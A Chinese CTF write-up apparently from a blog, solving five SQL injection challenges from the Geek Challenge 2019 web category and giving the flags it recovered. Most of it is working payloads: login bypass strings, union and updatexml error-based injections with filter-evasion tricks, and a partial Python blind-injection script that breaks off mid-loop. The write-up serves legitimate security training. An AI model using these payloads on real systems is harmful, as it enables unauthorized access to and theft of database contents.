[极客大挑战 2019]web部门题解(已完结!)
SQL部门:[极客大挑战 2019]BabySQL
打开环境后有登录界面◕‿◕
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240316172014566-662396620.png
一眼注入,后先试试万能密码:
username:admin' or '1'='1
password:1 GG,出大标题,我就会这一招啊O.o??完结撒花(不是
꒰ঌ( ⌯' '⌯)໒꒱开顽笑的,着看着像是过滤了or厥后尝试了一下oorr双写发现也不行,那咱继续注入哈:
尝试输入下正常的union select等语句发现都被过滤了,那接下来把他们都双写看一下:
/check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318145019424-151448907.png
看到情况是不报错,是列数不对啊
那就使用二分法一个一个排查,发现列数是3的时间就对了:
/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,3 %23https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318145120329-157492153.png
后边就简单了,直接附代码了:
/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,database() %23 #爆库 https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318145255146-1269676396.png
/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23
#列出所有库 https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318145330821-462195932.png
看到了ctf库进去:
/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere
table_name="Flag" %23 https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318150007823-1305345943.png
直接拿数据就好了:
/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag) %23https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318150049257-1492995627.png
得到Flag:
flag{ea47f9af-b37b-4f94-a04d-c5b249737afe}[极客大挑战 2019]EasySQL
看到第二题,发现界面没变,还长这样
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318151135374-1880411101.png
话不多说,万能密码尝试一下:
username:1
passwd:admin' or '1'='1https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318151309786-418792816.png
啊?直接出?好吧,看来是练手的:
flag{ef920bf4-ed7f-419b-af87-409fa306319a}[极客大挑战 2019]HardSQL
好,出题人不知改过,那就让他终身难忘(doge
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318151716908-1903579692.png
同样的万能密码起手,能简单来我们就不睁开做o.O
username:admin' or '1'=1'
passwd:1 https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318151921999-254894524.png
好小子,那我可要进去了!
admin
1' order by 3#?还是这样是吧,那就bp看狙击手模式下你给我过滤了多少字段!
fuzz完发现空格 ,表明符,and,by,=,sleep,/,~等都被过滤了,行,那就进入报错注入环节:
使用()代替空格,使用like代替=,使用^毗连函数形成异或
查了其他数据库最后锁定在geek里边
先查表:
admin'or(updatexml(1,concat(0x7e,database()),1))# https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154141034-1248006368.png
好小子,漏出马脚了吧,那接下来爆表名:
admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))# https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154337114-691939627.png
继续:
admin'or(updatexml(1%2Cconcat(0x7e%2C(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))%2C1))%23https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154409740-459131404.png
出敏感字段,结束了,胜负已分( ´◔︎ ‸◔︎`)
admin'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1))),1))#https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154522014-775607221.png
但是只出来左半边?那好说了,左右分开就好了:
admin'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)where(username)like('flag'))),1))# https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154657891-1609430077.png
flag{de3015f5-b395-4395-86c8-cf2ddf32e801}[极客大挑战 2019]LoveSQL
ok看看这个家伙还会来什么
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318161413539-467462701.png
先输入万能密码:
用户名:1' or 1=1#
密码:123(随便输)https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318161515464-1858232999.png
爆出了一些字段,接下来我们试一下团结注入,二分法先确认是3个字段:
/check.php?username=1' union select 1,2,3%23&password=1得到回显位置为2、3,查一下版本号:
/check.php?username=1' union select 1,database(),version()%23&password=1https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318161832740-1494057203.png
得到关键信息geek为数据名称,接下来就可以常规步骤了:
爆表:
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318161932662-833795332.png
爆字段:
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318162000882-1261776646.png
爆数据:
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1得到flag:
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318162102252-2069416664.png
flag{c76c8911-1aa0-494f-bd2d-1d7356abef1f}
[极客大挑战 2019]FinalSQL
最后一个了,小小出题人又会干嘛呢?0.0
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154904035-961266394.png
ok,又是一堆乱七八糟的,挨个点击以后发如今第五个里边说有个id=6
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154947618-1563362035.png
那就修改下id=6:
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318155017467-156110500.png
.https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318155030978-454334927.png
这么一看方向是对的,那接下来分析一下:
测试这个地方是否存在注入,结果发现他有过滤,过滤了空格、星号等特别符号,但是减号、异或符、除号并未过滤,并且测出此处为数字型注入而非字符型注入。(测试方法:传值1、2-1、1/1、1^0等结果正常表现,而输入3-1则表现“2”的页面)
这样的话,要二分法盲注了,这里给各人直接脚本了,一个大牛的,一个我的:
脚本1:
# -*- coding: utf-8 -*-import reimport requestsimport stringimport timeurl = "#url+id="flag = ''def payload(i, j): # 数据库名字 #sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j) # 表名 #sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j) # 列名 #sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j) # 查询flag sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j) data = {"id": sql} r = requests.get(url, params=data) # print (r.url) if "Click" in r.text: res = 1 else: res = 0 return resdef exp(): global flag for i in range(1, 10000): print(i, ':') low = 31 high = 127 while low
页:
[1]